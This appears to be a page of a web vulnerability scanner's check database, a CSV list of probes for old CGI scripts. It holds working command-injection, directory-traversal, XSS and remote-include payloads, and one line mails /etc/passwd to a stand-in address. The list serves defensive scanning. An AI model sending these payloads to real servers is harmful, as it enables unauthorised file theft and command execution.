scan_database.db

来自「Ubuntu packages of security software。 相」· DB 代码 · 共 422 行 · 第 1/5 页

"generic","@CGIDIRSblog/mt.cfg","configuration file","GET","Movable Type configuration file found. Should not be available remotely."
"generic","@CGIDIRSbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10","root:","GET","This CGI allows attackers to read arbitrary files on the server."
"generic","@CGIDIRSboozt/admin/index.cgi?section=5&input=1","200","GET","Boozt CGI may have a buffer overflow. Upgrade to a version new than 0.9.8alpha."
"generic","@CGIDIRSc32web.exe/ChangeAdminPassword","200","GET","This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password."
"generic","@CGIDIRScachemgr.cgi","200","GET","Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans."
"generic","@CGIDIRScal_make.pl?p0=../../../../../../../../../../etc/passwd%00","root:","GET","This CGI allows attackers to read arbitrary files on the host."
"generic","@CGIDIRScalendar_admin.pl?config=|cat%20/etc/passwd|","root:","GET","This CGI allows attackers to read arbitrary files on the host."
"generic","@CGIDIRScalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","uid","GET","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html"
"generic","@CGIDIRScalendar/calendar_admin.pl?config=|cat%20/etc/passwd|","root:","GET","This CGI allows attackers to read arbitrary files on the host."
"generic","@CGIDIRScalendar/index.cgi","200","GET","Mike's Calendar CGI contained a bug which allowed arbitrary command execution (version 1.4), see http://freshmeat.net/projects/mycalendar/"
"generic","@CGIDIRScampas?%0acat%0a/etc/passwd%0a","root:","GET","This CGI allows attackers to read arbitrary files on the server."
"generic","@CGIDIRScart.pl?db='","c:\","GET","Dansie Shopping Cart reveals the full path to the CGI directory."
"generic","@CGIDIRScart.pl?db='","d:\","GET","Dansie Shopping Cart reveals the full path to the CGI directory."
"generic","@CGIDIRScart32.exe","200","GET","request cart32.exe/cart32clientlist"
"generic","@CGIDIRSccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRScgi-lib.pl","200","GET","CGI Library. If retrieved check to see if it is outdated, it may have vuls"
"generic","@CGIDIRScgicso?query=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRScgicso?query=AAA","400 Required field missing: fingerhost","GET","This CGI allows attackers to execute remote commands."
"generic","@CGIDIRScgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00","root:","GET","This CGI allows attackers to read arbitrary files on the server."
"generic","@CGIDIRScgiwrap","200","GET","Some versions of cgiwrap allow anyone to execute commands remotely."," "
"generic","@CGIDIRScgiwrap/%3Cfont%20color=red%3E","<font color=red>","GET","cgiwrap allows HTML and possibly CSS injection. See http://archives.neohapsis.com/archives/bugtraq/2001-07/0499.html for details."
"generic","@CGIDIRScgiwrap/~@USERS","UID of script userid","GET","cgiwrap can be used to enumerate user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration."
"generic","@CGIDIRScgiwrap/~JUNK(5)"," unable to find the user","GET","Based on error message, cgiwrap can likely be used to find valid user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration."
"generic","@CGIDIRScgiwrap/~root","UID of script userid","GET","cgiwrap can be used to enumerate user accounts.  Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration."
"generic","@CGIDIRSclass/mysql.class","This program is free software","GET","Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials."
"generic","@CGIDIRSclassified.cgi","200","GET","Check Phrack 55 for info by RFP"
"generic","@CGIDIRSclassifieds/classifieds.cgi","200","GET","Mike's Classifieds CGI contained a bug which allowed arbitrary command execution (version 1.2), see http://freshmeat.net/projects/myclassifieds/"
"generic","@CGIDIRSclassifieds/index.cgi","200","GET","My Classifieds pre 2.12 is vulnerable to SQL Injection attacks."
"generic","@CGIDIRScommerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html","root:","GET","This CGI allows attackers to read arbitrary files on the server."
"generic","@CGIDIRScommon.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","root:","GET","This CGI allows attackers to read files on the host."
"generic","@CGIDIRScommon/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|","resolv.conf","GET","Allows attacker to execute commands as http daemon. Upgrade or remove."
"generic","@CGIDIRScompatible.cgi","200","GET","This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRSCount.cgi","200","GET","This may allow attackers to execute arbitrary commands on the server"
"generic","@CGIDIRScsChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","root:","GET","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version."
"generic","@CGIDIRScsGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","root:","GET","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version."
"generic","@CGIDIRScsh","200","GET","Shell found in CGI dir!"
"generic","@CGIDIRScsLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","root:","GET","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version."
"generic","@CGIDIRScsNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","root:","GET","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version."
"generic","@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`","root:","GET","csSearch (http://www.cgiscript.net/) has a major flaw which allows perl to be executed remotely. Upgrade to a version higher than 2.3. CAN-2002-0495."
"generic","@CGIDIRScvsblame.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRScvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRScvslog.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRScvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","<script>alert('Vulnerable')</script>","GET","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRScvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","<script>alert('Vulnerable')</script>","GET","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRScvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","<script>alert('Vulnerable')</script>","GET","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRSdansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>","<script>alert('Vulnerable');</script>","GET","CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. CA-2000-02."
"generic","@CGIDIRSdata/fetch.php?page=","mysql_num_rows","GET","StellarDocs allows remote users to see file system paths. BID-8385."
"generic","@CGIDIRSdb4web_c/dbdirname//etc/passwd","root:","GET","The passwd file was retrieved by using the db4web executable."
"generic","@CGIDIRSdbman/db.cgi?db=no-db","200","GET","This CGI allows remote attackers to view system information."
"generic","@CGIDIRSdcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00","root:","GET","This install of DCForum allows attackers to read arbitrary files on the host."
"generic","@CGIDIRSdcshop/auth_data/auth_user_file.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
"generic","@CGIDIRSDCShop/auth_data/auth_user_file.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
"generic","@CGIDIRSdcshop/orders/orders.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
"generic","@CGIDIRSDCShop/orders/orders.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
"generic","@CGIDIRSdiagnose.cgi","200","GET","This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRSdirectorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00","root:","GET","This CGI allows attackers to read arbitrary files on the server."
"generic","@CGIDIRSdose.pl","200","GET","DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter."
"generic","@CGIDIRSdownload.cgi","200","GET","v1 by Matt Wright; check info in Phrack 55 by RFP"
"generic","@CGIDIRSdumpenv.pl","200","GET","This CGI gives a lot of information to attackers."
"generic","@CGIDIRSecho.bat?&dir+c:\",","200","GET","This batch file may allow attackers to execute remote commands."
"generic","@CGIDIRSecho.bat","200","GET","This CGI may allow attackers to execute remote commands."
"generic","@CGIDIRSempower?DB=whateverwhatever","db name whateverwhatever of directory /","GET","This CGI allows attackers to learn the full system path to your web directory."
"generic","@CGIDIRSemu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","root:","GET","EmuMail allows any file to be retrieved from the remote system."
"generic","@CGIDIRSemumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","root:","GET","EmuMail allows any file to be retrieved from the remote system."
"generic","@CGIDIRSemumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","root:","GET","EmuMail allows any file to be retrieved from the remote system."
"generic","@CGIDIRSenviron.pl?param1=<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRSerba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","<script>alert('Vulnerable')</script>","GET","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRSerrors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/","http://xxxxxxxx/errors/configure_instructions","GET","Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version."
"generic","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","\/perl","GET","This CGI allows attackers to execute commands on the remote server. CAN-2001-1014."
"generic","@CGIDIRSexcite;IFS=\"$\";/bin/cat /etc/passwd|mail test@test.com","200","GET","Excite software is vulnerable to password file theft remotely."
"generic","@CGIDIRSezadmin.cgi","200","GET","Some versions of this CGI are vulnerable to a buffer overflow."
"generic","@CGIDIRSezboard.cgi","200","GET","Some versions of this CGI are vulnerable to a buffer overflow."
"generic","@CGIDIRSezman.cgi","200","GET","Some versions of this CGI are vulnerable to a buffer overflow."
"generic","@CGIDIRSezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|","200","GET","EZShopper loadpage CGI read arbitrary files"
"generic","@CGIDIRSezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1","200","GET","EZShopper search CGI read arbitrary files"
"generic","@CGIDIRSfaqmanager.cgi?toc=/etc/passwd%00","root:","GET","FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version: http://www.fourteenminutes.com/code/faqmanager/"
"generic","@CGIDIRSfaxsurvey?cat%20/etc/passwd","root:","GET","This CGI allows attackers to execute commands and read files remotely."
"generic","@CGIDIRSFileSeek.cgi?head=;cat%20/etc/passwd|&foot=","root:","GET","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com"," "
"generic","@CGIDIRSFileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=","root:","GET","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com"," "
"generic","@CGIDIRSFileSeek.cgi?head=&foot=;cat%20/etc/passwd","root:","GET","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com"," "
"generic","@CGIDIRSFileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd","root:","GET","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com"," "
"generic","@CGIDIRSFileSeek2.cgi?head=;cat%20/etc/passwd|&foot=","root:","GET","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com"," "
"generic","@CGIDIRSFileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=","root:","GET","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com"," "
"generic","@CGIDIRSFileSeek2.cgi?head=&foot=;cat%20/etc/passwd","root:","GET","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com"," "
"generic","@CGIDIRSFileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd","root:","GET","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com"," "